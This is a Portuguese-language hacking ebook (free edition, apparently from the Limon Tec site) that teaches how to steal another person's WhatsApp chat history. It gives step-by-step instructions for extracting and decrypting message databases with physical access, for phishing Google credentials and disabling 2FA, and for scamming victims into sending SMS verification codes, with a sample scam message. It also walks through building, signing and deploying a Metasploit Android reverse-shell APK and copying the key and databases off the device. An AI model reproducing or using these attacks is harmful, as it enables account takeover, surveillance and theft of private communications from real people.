Você está na página 1de 18

VERSÃO GRATUITA!

COMPRE A VERSÃO COMPLETA EM:

https://www.limontec.com/2020/01/ebook-manual-hacker-whatsapp-edicao-2020.html

Apresentação
Olá caro leitor, neste ebook você aprenderá técnicas utilizadas por hackers que
hackeiam usuários do popular aplicativo de mensagens WhatsApp. As técnicas
apresentadas aqui são facilmente reproduzíveis e não explora qualquer vulnerabilidade no
aplicativo, pois foca nos leitores que não possuem conhecimento técnico em informática e
segurança, mas lembre-se que os envolvidos na produção e distribuição deste ebook não
se responsabilizam pelos seus atos, ou seja, você assume toda a responsabilidade pela
reprodução que fazer das técnicas apresentadas neste ebook, portanto aconselho a realizar
os procedimentos em ambiente controlado e autorizado.

Este ebook foi produzido em parceria com a equipe ​Limon Tec que disponibilizará tutoriais
das técnicas apresentadas aqui em formato de vídeo, antes ou depois de cada explicação
do método você verá um link para um vídeo no YouTube contendo a demonstração do
método.

Quem sou eu?

Chegou a hora de me apresentar, sou estudante de graduação em Computação


interessado em técnicas utilizadas por hackers. Faço parte da equipe Limon Tec a alguns
anos, o que me permite assumir o pseudônimo de Limon. Caso necessite falar comigo ou
​ ttps://www.limontec.com/p/contato.html​ .
outro membro, visite h

O que é Limon Tec?

É um site dedicado a publicação de conteúdo relacionado a tecnologia, hacking e


criptomoedas. Sob o lema “Simples e fácil de entender tecnologia” a equipe Limon Tec
disponibiliza artigos e vídeos tutoriais muita vezes inéditos no idioma português ajudando a
disseminar informação de qualidade pela internet, prova disso são seus números: mais de 7
milhões de visualizações em suas páginas e mais de 3 milhões de visualizações em seu
canal no YouTube​.
Hackeando WhatsApp
As técnicas apresentadas aqui são técnicas que ​não exploram vulnerabilidades no
aplicativo, os métodos que aqui serão apresentados são melhor associadas a aplicação de
engenharia social ou acesso físico ao dispositivo do alvo. Engenharia social consiste em
uma técnica de convencer uma pessoa a fazer algo que você precisa sem levantar
suspeitas. Por conta disso será muito fácil reproduzir as técnicas se você não entende de
programação de aplicações mobile, bem como de segurança. Note que irei focar em
métodos que visam extrair todo o histórico de conversa de uma conta do WhatsApp, o que é
bastante utilizado pela polícia forense ao apreender um dispositivo de um suspeito visando
descobrir seus contatos e conversas no aplicativo.
Como não temos aparelhos com iOS, só poderemos demonstrar as técnicas visando
alvos que utilizam aparelhos Android, aviso logo para ficar atento as versões do Android em
que a técnica é possível durante a leitura, mas o conceito das técnicas são úteis para se
poder aprender a replicar em outros dispositivos como os que rodam iOS, por exemplo,
iPhones.
Antes de começar a apresentar as técnicas você precisa entender que o WhatsApp
por padrão armazena automaticamente todas as suas conversas no próprio smartphone, ou
seja, as conversas não ficam armazenada em um servidor deles, por isso que quando você
troca de celular é necessário recuperar o backup de conversas do seu WhatsApp
armazenado no dispositivo antigo para ter de volta todas as suas antigas conversas, ou
mesmo quando utiliza a opção de WhatsApp Web (usar WhatsApp no navegador) o
aparelho precisa estar conectado a internet além do seu computador para que as conversas
sejam carregadas do celular no computador. O app também lhe dá a opção de salvar este
backup automaticamente em sua conta de armazenamento no Google Drive, ai é só baixar
diretamente o backup no seu novo smartphone logado em sua conta Google para restaurar
o histórico de conversas.
Este arquivo que armazena as conversas possui o nome no momento em que
escrevo este ebook de “msgstore.db.crypt12” e fica armazenado, se a opção de backup
local estiver ativada, no seguinte caminho “.../WhatsApp/Databases/msgstore.db.crypt12”,
note que antes dos 3 pontos pode ser o caminho para a memória interna do seu aparelho
ou seu cartão de memória, depende de onde optou por instalar o WhatsApp. Também é
possível extrair o arquivo de conversa salvo na conta no Google Drive, para isso será
necessário email e senha da conta.
Você percebe que o arquivo que contém o histórico de conversas está criptografado
com uma chave (key) de segurança ao notar o termo “.crypt12” após “msgstore.db”,
portanto as técnicas para descriptografar que serão apresentadas a seguir foram testadas
na versão “.crypt12” do arquivo de backup do WhatsApp, caso possua um arquivo “.crypt11”
ou inferior o método pode variar (inclusive sendo até mais simples, pesquise na internet),
mas se no momento que ler este ebook estejamos em um “.crypto13” ou superior ou mesmo
outro nome não garanto que a técnica funcione, mas o conhecimento adquirido aqui vai lhe
ajudar compreender o processo que pode ser adaptado para outras situações.
Para descriptografar o arquivo “msgstore.db.crypt12” é necessário obter
primeiramente a chave (key) de segurança, esta chave se encontra em um local controlado
pelo sistema, ou seja, você precisa de privilégios para acessar a pasta em que a chave fica
armazenada, imagine um cofre. Com isso em mente você tem duas opções, a mais simples
é fazer root no aparelho, root consiste em se tornar administrador do sistema, ser capaz de
abrir o cofre, atualmente existem diversos aplicativos que facilitam o método de fazer root
no Android, mas como são inúmeros modelos de smartphones rodando Android disponíveis
no mercado, não é possível nós fazer um guia passo a passo de como realizar root,
portanto pesquise na internet “como fazer root no ____ android ____”, seguido pelo nome
do modelo do seu dispositivo e a versão do Android que ele está rodando. Note que se o
processo de root não for feito corretamente pode acarretar em problemas no sistema bem
como a perda de garantia do aparelho, portanto faça por sua conta e risco. Curiosidade,
semelhante a fazer root no Android é o termo fazer jailbreak no iOS.
Caso não queria fazer root, existe outro procedimento para extrair a chave do
WhatsApp que iremos demonstrar, mas fazer root é o mais aconselhável pois se o aparelho
estiver com acesso de superusuário (root) a probabilidade da extração da chave dar errado
é 0%. Com isso em mente, acabamos de informar um motivo pelo qual você deve ter
cuidado ao ceder permissão de superusuário (administrador do sistema) a certos aplicativos
caso possua um aparelho com root, estes podem roubar e descriptografar suas conversas
do WhatsApp sem você notar.
Hackeando com acesso físico

Sem root
A técnica apresentada abaixo funciona nas versões do Android inferior a 7.0
(Nougat) e foi testada com sucesso em um Samsung Galaxy J mini rodando Android 5.1.1 e
um Samsung Galaxy J2 Prime rodando Android 6.0.1, realizando o procedimento a partir de
um computador rodando Windows 10.
Essa técnica funciona em computadores Linux e Mac OS X, só que como a maioria
do público leigo interessado usam Windows, irei focar neste sistema. Portanto caso use
Linux, o procedimento é o mesmo, só muda a forma de instalação das ferramentas, que em
sua maioria das vezes é mais simples e o tipo de script que deve executar é diferente, não
se preocupe que informarei quando necessário e caso use Mac siga os passos para Linux.

Link para vídeo explicando o procedimento realizado abaixo: ​http://bit.ly/2RMUHqg

Atenção: além de assistir o vídeo, é altamente recomendado a leitura do procedimento


abaixo, embora sejam a mesma coisa pode ser que responda dúvidas que possam surgir
enquanto assiste ao tutorial.

Bom, vamos configurar primeiramente nossa máquina Windows para rodar


perfeitamente a ferramenta de extração do histórico de conversas do WhatsApp
descriptografado, sim vai extrair já descriptografado! Atenção a versão do Java utilizada,
pode ser que uma versão diferente não funciona corretamente pelo passo a passo
detalhado aqui.

Baixe as seguintes ferramentas:


​ ttps://www.java.com/pt_BR/download/​ *
1. Java: h
2. Drivers ADB: ​https://adb.clockworkmod.com/​ **
3. Script Hacker: ​https://github.com/limontec/WhatsApp-Key-DB-Extractor
4. Visualizador CHAT: ​https://github.com/limontec/whatsapp-viewer​ ***

*Versão utilizada jre-8u231 com sucesso.


**Caso utilize Linux, procure outra fonte para baixar os drivers ADB.
***Caso utilize Linux, você pode usar o ​Whapa​.
Depois de realizado o download, instale o Java e os drivers ADB, é muito simples a
instalação, o famoso avança, avança, concluir. Em seguida extraia o conteúdo do arquivo
WhatsApp-Key-DB-Extractor-master.zip para alguma pasta de fácil acesso. Pronto, agora

para tudo ocorrer com sucesso você precisa


acessar o dispositivo fisicamente e ir no menu
“​Configurações​”. Lá, procure por “​Sobre o
dispositivo​” e em seguida por “​Info. Software​”,
então clique umas 5 vezes seguidas sobre
“​Número de compilação​” até aparecer uma
mensagem informando “​O modo de
desenvolvedor foi ativado​”. Então, agora volte
para o menu configurações e você deve ver no
fim a opção “​Opções do desenvolvedor​”. Entre
nela e habilite as opções “​Permanecer ativo​”
(para tela permanecer acesa enquanto estiver
conectado via cabo usb) e “​Depuração USB​”
(para extrair e descriptografar as conversas).
Pronto, agora basta plugar o smartphone no
computador por um cabo USB e aguardar o
dispositivo ser reconhecido pelo Windows, em
“​Meu Computador​” ou “​Este Computador​” você
deve visualizar o aparelho no Windows, confira
se aparece o armazenamento interno do
aparelho, se sim, tudo certo podemos continuar,
caso contrário pode ser algum problema com
drivers, retire o aparelho e reinicie o computador e tente conectar novamente até ser
reconhecido.
Agora você pode rodar o script para extrair e descriptografar o histórico de
conversas, acesse a pasta que você extraiu, “​WhatsApp-Key-DB-Extractor-master​” e
execute o arquivo “​WhatsAppKeyDBExtract.bat​” dando dois cliques nele. Não encontrou
qual dos “​WhatsAppKeyDBExtract​” é .bat? Simples, remova a ocultação das extensões dos
arquivos, para isso no Windows clique em “​Exibir”​ (guia presente no topo da pasta onde
está os arquivos), então marque a caixa “​Extensões de nomes de arquivos​” para que as
extensões dos arquivos sejam exibidas e você saiba qual arquivo clicar para executar.

Caso use Linux o script é o “​WhatsAppKeyDBExtract.sh​”, pode ser que seja necessário dar
permissões para execução do script “​chmod +x WhatsAppKeyDBExtract.sh​”. No Windows,
se você tiver problemas com o arquivo “​.bat​”, clique com o botão direito sobre o arquivo de
mesmo nome só que com final “​.ps1​” e selecione “​Executar com PowerShell​”, no terminal
aperte “​y​” na primeira execução.
Bom, execute o script aguarde aparecer no terminal a mensagem “​daemon started
successfully​”. Em seguida plugue seu smartphone se ainda não tiver plugado, deve então
aparecer na tela do seu smartphone “​Permitir depur. USB?​”, apenas clique em “​Ok​” que
logo em seguida o script irá automaticamente realizar os procedimentos necessários para
extrair as conversas. O procedimento consiste em baixar uma versão antiga do WhatsApp,
depois salvar a versão que está no aparelho e instalar a versão antiga baixada, depois disso
no aparelho aparecerá uma mensagem “​Backup completo​” solicitando para você inserir uma
senha, coloque então uma senha fácil, em alguns aparelhos pode ser que não necessite
inserir uma senha, a senha é solicitada quando o aparelho possui criptografia ativada, em
seguida apenas clique em “​FAZER BACKUP DE MEUS DADOS​”. Feito isso aguarde a tela
de backup sumir do celular e aparecer rapidamente “​O backup foi concluído​”. No terminal,
no computador, será solicitado então que você insira a senha que você colocou no
smartphone, caso não inseriu senha apenas dê enter. Dado enter, agora é só aguardar o
processo terminar, o script vai extrair
as conversas e depois restaurar a
versão do WhatsApp que estava
sendo usada no aparelho, note que no
celular o WhatsApp estará intacto
após a realização do procedimento, ou
seja, não precisa ter medo pois tudo
volta ao normal caso o processo não
seja interrompido inesperadamente.
Quando o procedimento terminar, no
terminal irá aparecer “​Operation
complete​” e por fim “​Pressione qualquer tecla para continuar…​”, dê enter e o terminal será
fechado. Navegue então para a pasta onde se encontra o script e entre na pasta
“​extracted​”, nela você vai visualizar os arquivos “msgstore.db” (histórico de conversas já
descriptografado) e “wa.db” (ele serve para converter os números dos telefones com o qual
você conversou em nome de contatos que estavam no aparelho), estes dois arquivos serão
usados a partir de agora para visualizar as conversas que estavam no aparelho. Você já
pode desconectar o aparelho do computador. Note que o arquivo “whatsapp.cryptkey”
contém a key mas nosso “msgstore.db” já está descriptografado, portanto não será
necessário usar a key para descriptografar.
Lembra que você baixou no seu Windows o “Visualizador CHAT”, procure e extraia o
arquivo “WhatsApp.Viewer.zip” e em seguida execute o arquivo “WhatsApp Viewer.exe”. Na
janela que abrir, aperte “​File​” e em seguida “​Open…​”. No primeiro campo “​File​” aponte para
o arquivo “msgstore.db” e no campo “​wa.db (optional)​” aponte para o arquivo “wa.db”,
ambos presente na pasta “extracted” da ferramenta “WhatsApp-Key-DB-Extractor”.

Dê um “Ok” e pronto, agora é possível visualizar todas a conversas realizadas no


WhatsApp. Caso use Linux, utilize o script “Whapa” para visualizar as conversas, no
capítulo “Hackeando remotamente - sem root” demonstraremos sua instalação.
Não esqueça de desabilitar depois no smartphone a “​Opções do desenvolvedor​”, em
configurações acesse “​Opções do desenvolvedor​” e desmarque a opção “​Ativado​”.
Note que arquivos de fotos, vídeos e mensagem de voz enviado e recebidos no
WhatsApp não são criptografados, eles podem ser facilmente encontrados acessando o
armazenamento interno ou cartão de memória e em seguida a pasta “WhatsApp/Media/”
nela você verá as pastas para os arquivos.
Para ocultar novamente as “​Opções do desenvolvedor​”, basta ir em aplicativos…
então liste todos os aplicativos instalados e selecione o aplicativo “​Config.​” ou “​Settings​”, em
seguida procure por “​Armazenamento​” e clique em “​Limpar dados​”.

Com root
A técnica que será apresentada visa extrair a chave (key) para descriptografar
arquivos “msgstore.db.crypt12”, o processo em aparelhos que possui ​root é muito simples,
com acesso físico ao aparelho você precisa primeiramente baixar e instalar algum aplicativo
explorador de arquivo com suporte a root. Existem diversos no Google Play, por experiência
recomendamos o R ​ oot Browser Classic baixe, instale-o e dê permissões de root assim que
solicitado. Depois de permitir o acesso de super usuário, navegue pelo caminho
“/data/data/com.whatsapp/files”, dentro da pasta “files” você vai encontrar o arquivo “key”.
Copie então o arquivo “key” para sua pasta “Downloads” para facilitar seu compartilhamento
mais tarde. A imagem abaixo ilustra o processo:
Como sabem a “key” serve para descriptografar o arquivo “msgstore.db.crypt12” que fica no
caminho da memória interna ou externa “.../WhatsApp/Databases/” quando o backup local
do WhatsApp está ativado, mas já que você está com acesso ao root, você pode extrair o
arquivo “msgstore.db” já descriptografado, o que lhe poupa muito tempo! No caminho
“/data/data/com.whatsapp/Databases/” você encontra o arquivo “msgstore.db”, basta então
copiar ele para a pasta “Downloads”, aproveite e pegue também o arquivo “wa.db” ele serve
para converter os números dos
contatos em nomes. Com os arquivos
na pasta download você consegue
enviar eles para seu computador e
consegue visualizar o conteúdo sem
fornecer a chave para
descriptografar, para isso você pode
usar o programa citado no capítulo
anterior o “WhatsApp Viewer.exe”.
Você deve estar se perguntando: “​Se
já extraímos o arquivo descriptografado porque necessitaríamos da key?​”. Bom, ela pode
ser útil para descriptografar o arquivo “msgstore.db.crypt12” que é armazenado
automaticamente na conta no Google Drive, cujo backup é feito periodicamente, no próximo
capítulo você aprenderá a extrair o backup da conta no GDrive.
Hackeando remotamente
Para realizar com sucesso o procedimento, primeiramente é necessário obter o
arquivo “msgstore.db.crypt12” do aparelho do alvo. Para isso você pode infectar o aparelho
do alvo utilizando de engenharia social fazendo o alvo instalar determinado aplicativo
malicioso sem perceber, para então poder fazer o download do arquivo que contém as
conversas criptografadas. Ou pode utilizar de técnicas como phishing (criação de página
falsa) para que o alvo forneça seu email e senha de sua conta Google ou mesmo infectar o
computador do alvo com um keylogger afim de capturar tudo que ele digita até o momento
em que ele realiza login em sua conta Google, para que depois seja feito o download do
arquivo “msgstore.db.crypt12” armazenado em sua conta no Google Drive.

Sem root
Para a opção sem root, a técnica utilizada consiste em ativar o número do alvo em
outro aparelho que possua root ou Android inferior a versão 7, o segundo aparelho deve
possuir root pois assim podemos facilmente extrair a key, se não você pode optar por ativar
o número em um aparelho compatível com a técnica ensinada no capítulo “Hackeando com
acesso físico - sem root” ou mesmo utilizar um emulador de android com root habilitado, em
seu computador. O objetivo principal então é capturar do smartphone do alvo e em seguida
carregar, em um Android que você controle, o arquivo “msgstore.db.crypt12” no caminho
padrão que fica guardado as conversas
“.../WhatsApp/Databases/” e então gerar a
mesma chave que criptografou para
descriptografar este arquivo. O processo de
gerar a chave consiste basicamente em solicitar
a criação de uma conta no WhatsApp, será
então enviado um SMS, ou feito uma ligação,
para o número do alvo. Neste momento você
precisa ser capaz de capturar o código fornecido
e inserir no seu aparelho para gerar a chave e
descriptografar as conversas. Para capturar o
código, existem diversas técnicas avançadas,
algumas já foram até protagonizadas em séries
como Mr Robot, mas para simplificar usar a boa
e velha engenharia social ainda é muito útil na
maioria dos casos.
Por exemplo para esta técnica podemos entrar
em contato via WhatsApp com o nosso alvo
solicitando ajuda: “​Olá, preciso que me ajude,
meu WhatsApp deu problema, não to conseguindo enviar mensagem para outras pessoas,
se chegar um sms aí com um código me envie o código para que eu possa solucionar meu
problema, é muito ruim ficar sem poder contactar meus amigos​”, muitos ainda caem em
algumas variantes deste antigo golpe. Note que o alvo ficará sem acesso ao WhatsApp no
momento que você conseguir ativar o código, ele então vai visualizar uma mensagem como
a mensagem da imagem acima. Então é muito provável que logo em seguida o alvo
perceberá que foi vítima mas você já terá o backup descriptografado em mãos, o que resta
para o alvo é apenas restaurar a conta. Neste momento alguns golpistas costumam
cadastrar um PIN a conta, para ganhar tempo e trancar o alvo do lado de fora
impossibilitando o alvo de restaurar a conta. O alvo somente conseguirá restaurar a conta
sem ser solicitado PIN após 7 dias do ocorrido.
Antes de realizar a descriptografia do arquivo, precisamos obter o arquivo. Para o
método envolvendo “sem root” vamos extrair o arquivo criptografado de uma conta no
Google Drive. Como mencionado anteriormente, existem diversas técnicas exploradas por
hackers para se ter acesso ao email do alvo. Você pode utilizar o velho e bom phishing,
mas note que pode ser que o sistema de segurança do Google detecta a atividade suspeita,
por isso é bom conhecer o alvo e manter um padrão de acesso… mesma localidade e
dispositivos que ele utiliza geralmente para realizar login, caso contrário o alarme vai soar e
o alvo será notificado de diversas formas para bloquear o acesso… caso não tenha como
manter o padrão de acesso do alvo, você pode optar por realizar o login, após capturar as
credenciais, em um horário que você tem certeza que o alvo não cheque as notificações,
caso o alvo possua autenticação em dois fatores o plano não funcionará… terá que planejar
algo diferente e desativar o 2FA para posteriormente poder extrair o arquivo.

Antes de prosseguir é necessário que possua o python 3 instalado em seu sistema, caso
use Windows confira este vídeo: ​http://bit.ly/358oKvu . Para os usuários de Mac e Linux, no
site oficial ​python.org​ vocês encontram o procedimento de instalação.

Link para vídeo explicando o procedimento realizado abaixo: ​http://bit.ly/37sCmDy

Recomendo assistir ao vídeo antes da leitura, pois está bem detalhado. Em parênteses
você encontra o tempo do vídeo em que o assunto é apresentado.

Parte 1: Baixe e instale a ferramenta. (0:11)

​ ttps://github.com/limontec/whapa
Link para versão do script utilizada no vídeo: h

Comando para instalar os requerimentos da ferramenta: ​pip3 install -r requirements.txt

Parte 2: Configurando a ferramenta. (4:18)


Edite o arquivo “settings.cfg” presente na pasta “cfg” com as informações de login de sua
conta Google, email e senha. Note que em “​celnumbr​” é necessário informar o número
referente a conta do WhatsApp que foi realizado o backup no padrão 55DDDnumero.

Parte 3: Desabilitar 2FA. (6:22)

Desabilite o 2FA caso esteja ativado em sua conta Google. Para isso visite a página:
myaccount.google.com/security​ e desative a autenticação em dois fatores.

Parte 4: Extraindo os dados. (7:08)

Na aba “Whagodri” selecione “info about account” e clique no ícone verde. A ferramenta
tentará conectar-se a sua conta Google. Caso receba algum erro relacionado a conexão,
feche a janela e abra novamente, mas antes acesse o seguinte site:
accounts.google.com/DisplayUnlockCaptcha e autorize o acesso, após autorizar tente rodar
a ferramenta novamente. Se error persistir, confira se digitou corretamente o email e senha
no arquivo “settings.cfg” bem como o número associado ao arquivo de backup. Se as
informações de backup forem listadas sem problema no terminal, então você já pode
realizar o download dos dados, para isso em “Download” marque o que deseja baixar…
tudo (all) ou apenas o msgstore.db.crypt12 (databases) e depois clique no ícone verde.
Note que o download pode demorar dependendo da quantidade de dados selecionados
para baixar. Os dados baixados estarão presente dentro da pasta “whapa-master” do script
separado em subpastas.
Abaixo você confere como descriptografar o arquivo msgstore.db.crypt12 extraído de sua
conta no Google Drive, foi utilizado em emulador Android com root habilitado, ​no Limon Tec
você confere um artigo sobre como instalar um emulador Android em seu Windows e
habilitar root. Note que você pode optar por realizar o procedimento em um Android sem
root rodando uma versão inferior do Android 7.0 para extrair o arquivo msgstore.db
descriptografado.

Link para vídeo explicando o procedimento realizado abaixo: ​http://bit.ly/2taGSrb

Depois de extrair o msgstore.db.crypt12, instale o WhatsApp e copie o arquivo para o


caminho “.../WhatsApp/Databases/”
(será necessário criar a pasta
“Databases”) em um outro Android.
Depois de copiado, abra o aplicativo
WhatsApp e registre o número
referente a quando foi gerado o
arquivo de backup
“msgstore.db.crypt12”, use a opção
enviar código por sms ou ligação.
Quando obter o código use ele para
ativar a conta. No aparelho que o
WhatsApp estava ativo receberá uma
notificação informando: “​Um código
de registro do WhatsApp foi solicitado
para seu número de celular​”.
Isso dificulta aplicar engenharia social em alguns alvos, mas se bem planejado a pessoa
pode até chegar a ignorar essa mensagem de aviso. Quando obter o código e ativar a conta
em outro aparelho, imediatamente no aparelho do alvo será notificado “​Desconectado do
WhatsApp. Seu número de celular não está mais registrado neste aparelho​”. Neste
momento é muito provável que o alvo vai reativar a conta, portanto seja rápido após inserir
o código de ativação. Caso o alvo tiver um pin ativado (uma senha de 4 dígitos), as coisas
complicam pois será necessário você obter o pin para continuar com a ativação da conta.
Novamente você precisa de utilizar de engenharia social, ideal é antes de solicitar a
ativação da conta é que você já possua o possível pin em mãos para não perder tempo, se
não terá que tentar hackear o endereço de email informado para a recuperação do pin.
Caso o alvo não tenha pin ou você informou o pin corretamente, rapidamente clique no
botão “RESTAURAR” quando aparecer “Backup encontrado”, o histórico de conversas
então começará a ser restaurado! Enquanto está sendo restaurado, a chave (key) para
descriptografar é criada, use um explorador de arquivos com privilégios de root e navegue
para o caminho “/data/data/com.whatsapp/files” e copie o arquivo “key” para outra pasta, por
exemplo para a pasta “download” que fica na memória interna do aparelho ou cartão sd,
faça isso rapidamente antes que o alvo reative o número. Pronto, agora você possui a
chave para descriptografar o arquivo “msgstore.db.crypt12”! Use alguma ferramenta que
descriptografa, como a ferramenta demonstrada no capítulo “Hackeando com acesso físico
- sem root”. Como dito anteriormente alguns golpistas costumam ativar um novo PIN e
cadastrar um email de recuperação para usar a conta por 7 dias após conseguir acesso a
conta.

Com root
A técnica que será apresentada abaixo embora seja um ataque remoto, todo a
conexão será feita pela rede local, ou seja, o alvo deve estar conectado na mesma rede wifi
que você. Você ainda pode adaptar o método para alcançar o alvo quando ele não estiver
na mesma rede local, utilizando ferramentas como ​no-ip ou ​ngrok​. Continuando,
basicamente o que faremos é criar um apk genérico e enviaremos para o alvo instalar
aplicando engenharia social. É possível injetar o código malicioso que permite a conexão
remota em alguns aplicativos populares, só que muitas ferramentas que oferecem isso não
conseguem injetar o código nos apps que são lançados atualmente, portanto é necessário
conhecimento técnico para injetar o código manualmente o que não é o foco deste ebook.

Link para vídeo demonstrando a técnica: ​http://bit.ly/36dptvW

Para conseguir conectar-se a um dispositivo Android remotamente utilizei do


Metasploit Framework que é uma ferramenta de código aberto para desenvolvimento e
execução de códigos em máquinas remotas. Existe versão dela nativa para Windows, mas
optei pela utilização da opção WSL do Windows, está opção permite rodar arquivos para
Linux nativamente no Windows 10. Para ativar o WSL no Windows basta acessar “​Painel de
Controle > Programas > Ativar ou desativar recursos do Windows​” em seguida procure por
"​Subsistema do Windows para Linux​" e marque ela. Será necessário reiniciar o computador
para realmente ativar o WSL.

Com o WSL ativo, acesse a loja de aplicativos da Microsoft e procure por “Kali
Linux”, existe também outras opções de sistemas como “Ubuntu” e “Debian”. Após instalar o
Kali Linux adicione o diretório dele presente no Windows nas exceções do seu antivírus ou
Windows Defender, isso é necessário pois pode ser que seu antivírus bloqueia o metasploit
durante a instalação já que o mesmo vem com códigos maliciosos prontos para serem
utilizados por você. No Windows Defender basta ir em "​Proteção contra vírus e ameaças >
Configurações de proteção contra vírus e ameaças > Adicionar ou remover exclusões​" e
apontar para o caminho
“C:\Users\seu_usuário_windows\AppData\Local\Packages\KaliLinux....” .

Agora abra o Kali e execute os comandos: "​sudo apt-get update​", “​sudo apt-get
upgrade​” e “​sudo apt-get install metasploit-framework​”. Após o último comando, o metasploit
já estará instalado. Como realizaremos o ataque em rede local ou seja pelo WiFi, no
terminal do Kali você pode consultar seu ip local com o comando “ifconfig”, será listado
então em “eth0” ou “wlan0” seu ip local, geralmente algo parecido com “192.168…” ou
“10.0.0…”. Em seguida crie o app malicioso com o comando: "​msfvenom -p
android/meterpreter/reverse_tcp LHOST=seu_ip LPORT=4444 R > nome_qualquer.apk​"
O apk gerado ainda não funciona em muitas versões do Android, pois é necessário
criar uma assinatura para ele. Instale então a ferramenta keytool, para gerar uma
assinatura, com o comando: "​sudo apt-get install openjdk-8-jdk​". Crie a assinatura com o
comando: "​keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg
RSA -keysize 2048 -validity 10000​" . Você pode preencher as informações solicitadas
aleatoriamente.
Com a assinatura em mãos, assine o apk com ela utilizando o seguinte comando:
"​jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore
my-release-key.keystore nome_do_apk.apk alias_name​". Ainda é preciso de outra
ferramenta para alinhar o apk, baixe e instale o zipalign com o comando: "sudo apt-get
install zipalign" . Em seguida alinhe o apk com o comando: "​zipalign -v 4 nomeapk.apk
novonome.apk​".
O apk agora está pronto, pelo Windows você encontrar ele no caminho
“​C:\Users\seu_usuário_windows\AppData\Local\Packages\KaliLinux....\LocalState\rootfs\ho
me\seu_user_linux\​” , com certeza alguns antivírus irão relatar ele como vírus, é possível
ofuscar o código malicioso presente no apk mas este método é
avançado o que não é o foco deste ebook, mas no site
limontec.com você encontra materiais sobre o tema de como
inserir o código malicioso em apps originais como Instagram.
Bom, envie o apk para o aparelho alvo… se instalar perceberá
que ele não abre nada apenas cria um app chamado
“MainActivity”, sempre que este app é aberto ele tenta se
conectar a máquina que está esperando conexão dele, portanto
agora em seu Kali vamos configurar a escuta. Digite o
comando “msfconsole” para iniciar o console do metasploit.
Então execute os comandos:

● "​use exploit/multi/handler​"
● "​set payload android/meterpreter/reverse_tcp​"
● "​set LHOST seu_ip_local​"
● “​exploit”​

Após dar o comando “exploit” a escuta está pronta aguardando


o app ser aberto (para este tutorial é necessário que o Android e seu Windows estejam na
mesma rede local), existem métodos já publicos no Limon Tec para tornar a conexão
persistente assim evitando ter que esperar o app ser aberto manualmente. Continuando,
quando a conexão for estabelecida, aparecerá no terminal “​meterpreter >” , então abra uma
shell com o comando “shell” para que seja possível dar comandos ao Android como se
estivesse no terminal do próprio Android. Agora adquira permissão de super usuário dando
o comando “su”, é necessária interação com o Android para autorizar essa solicitação. Uma
vez concedida agora podemos acessar diretórios do sistema, coisa que não é possível sem
root.

Os arquivos do WhatsApp que pretendemos capturar são os seguintes:

● /data/data/com.whatsapp/files/key
● /data/data/com.whatsapp/databases/wa.db
● /data/data/com.whatsapp/databases/msgstore.db

Para isso crie uma pasta no caminho da pasta padrão de Downloads do aparelho,
geralmente fica no cartão de memória no caminho “/sdcard/Download” , crie a pasta com o
comando “mkdir wppdata” estando dentro do diretório “Download”. Após criado a pasta
copie os arquivos do WhatsApp citados anteriormente para ela com os comandos abaixo:

● cp /data/data/com.whatsapp/files/key /sdcard/Download/wppdata
● cp /data/data/com.whatsapp/databases/wa.db /sdcard/Download/wppdata
● cp /data/data/com.whatsapp/databases/msgstore.db /sdcard/Download/wppdata

Isso é necessário pois não é possível fazer download direto de um diretório interno do
sistema. Saia da shell apertando “ctrl + c” seguido de “y”. Você verá novamente o
“​meterpreter >” então use o comando abaixo para realizar download dos arquivos presentes
na pasta que criamos “wppdata”:

● download /sdcard/Download/wppdata /home/seu_usuario_linux

Lembre que o caminho antes de “/Download/wppdata” pode ser diferente no seu aparelho
alvo. Feito o download, pelo Windows acesse o caminho
“C:\Users\seu_usuário_windows\AppData\Local\Packages\KaliLinux....\LocalState\rootfs\ho
me\seu_user_linux\” para encontrar os arquivos baixados. Agora use alguma ferramenta
como WhatsApp-Viewer ou Whapa para visualizar as conversas presente no arquivo
msgstore.db já descriptografado. Como você também capturou a key e possui o aplicativo
malicioso no aparelho, para ver conversas mais recentes basta se conectar remotamente ao
aparelho novamente pelo procedimento citado acima e baixar o arquivo
msgstore.db.crypt12 presente no caminho “.../WhatsApp/Databases/” não protegido pelo
sistema e então usar a key para descriptografar o arquivo!
Agradecimento
Obrigado por adquirir este ebook e pedimos desculpa caso não tenhamos atendido
suas expectativas, sinta-se à vontade para dar feedback ou nos corrigir pelas formas de
​ ttps://www.limontec.com/p/contato.html​.
contatos presente em h

Pedimos por favor que evite compartilhar publicamente este ebook com terceiros, embora
reconhecemos o quão belo e inspirador pode ser a informação livre e gratuita, a única forma
que encontramos de monetizar o tempo da equipe Limon Tec para trazer mais informações
gratuitas no site foi através da publicação deste ebook, a equipe Limon Tec agradece sua
compreensão.

Links úteis
Curso Hacker Grátis: ​https://www.limontec.com/2015/12/curso-hacker-wi-fi-limon-tec.html
Cursos Programação Grátis: h ​ ttps://www.limontec.com/2017/01/projeto-ltcode.html

​ ttps://youtube.com/limontec
Canal no YouTube: h
​ ttps://t.me/limontec
Canal no Telegram: h

Página no Facebook: h ​ ttps://facebook.com/limontecsocial


Página no Instagram: ​https://instagram.com/limontec
Página no Twitter: ​https://twitter.com/limontec

Powered by TCPDF (www.tcpdf.org)

Você também pode gostar